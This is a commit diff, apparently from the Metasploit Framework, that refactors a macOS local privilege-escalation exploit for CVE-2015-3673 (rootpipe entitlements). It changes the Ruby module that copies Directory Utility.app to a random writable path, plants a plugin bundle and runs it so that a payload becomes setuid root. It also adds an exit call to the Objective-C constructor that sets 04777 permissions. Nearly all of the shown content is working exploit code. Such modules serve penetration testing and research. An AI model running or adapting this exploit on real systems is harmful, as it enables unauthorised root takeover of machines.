Remove sleep(), clean up WritableDir usage.

2024-10-02 07:40:19 +02:00 · 2015-07-05 18:59:00 -05:00 · 2015-07-05 18:59:00 -05:00 · c993c70006
commit c993c70006
parent a8b56bb44a
3 changed files with 12 additions and 9 deletions
--- a/data/exploits/CVE-2015-3673/exploit.daplug
+++ b/data/exploits/CVE-2015-3673/exploit.daplug
--- a/data/exploits/CVE-2015-3673/exploit.m
+++ b/data/exploits/CVE-2015-3673/exploit.m
@ -28,4 +28,6 @@ void __attribute__ ((constructor)) test(void)
                     outpath,
                     @{ NSFilePosixPermissions : @04777 });
    }
+
+    exit(1);
 }
--- a/modules/exploits/osx/local/rootpipe_entitlements.rb
+++ b/modules/exploits/osx/local/rootpipe_entitlements.rb
@ -55,9 +55,9 @@ class Metasploit4 < Msf::Exploit::Local
  end

  def exploit
-    print_status("Copying Directory Utility.app")
-    cmd_exec('cp -R "/System/Library/CoreServices/Applications/Directory Utility.app" /tmp/')
-    cmd_exec('mkdir -p "/tmp/Directory Utility.app/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS"')
+    print_status("Copying Directory Utility.app to #{new_app}")
+    cmd_exec("cp -R '/System/Library/CoreServices/Applications/Directory Utility.app' '#{new_app}'")
+    cmd_exec("mkdir -p '#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS'")

    print_status("Writing bundle plist to `#{plist_file}'")
    write_file(plist_file, plist)
@ -70,9 +70,7 @@ class Metasploit4 < Msf::Exploit::Local
    write_file(exploit_file, plugin_exploit)

    print_status("Running Directory Utility.app")
-    cmd_exec('/bin/sh -c "PAYLOAD_IN='+payload_file+' PAYLOAD_OUT='+root_file+' /tmp/Directory\ Utility.app/Contents/MacOS/Directory\ Utility &"')
-
-    sleep(1)
+    cmd_exec("/bin/sh -c 'PAYLOAD_IN="+payload_file+" PAYLOAD_OUT="+root_file+" #{new_app}/Contents/MacOS/Directory\\ Utility'")

    print_status("Killing Directory Utility.app")
    cmd_exec('killall "Directory Utility"')
@ -109,17 +107,20 @@ class Metasploit4 < Msf::Exploit::Local
  end

  def exploit_file
-    "/tmp/Directory Utility.app/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS/RootpipeBundle"
+    "#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS/RootpipeBundle"
  end

  def plist_file
-    "/tmp/Directory Utility.app/Contents/PlugIns/RootpipeBundle.daplug/Contents/Info.plist"
+    "#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/Info.plist"
+  end
+
+  def new_app
+    @app ||= "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}.app"
  end

  def plist
    %Q|
      <?xml version="1.0" encoding="UTF-8"?>
-      !DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
      <plist version="1.0">
      <dict>
        <key>CFBundleGetInfoString</key>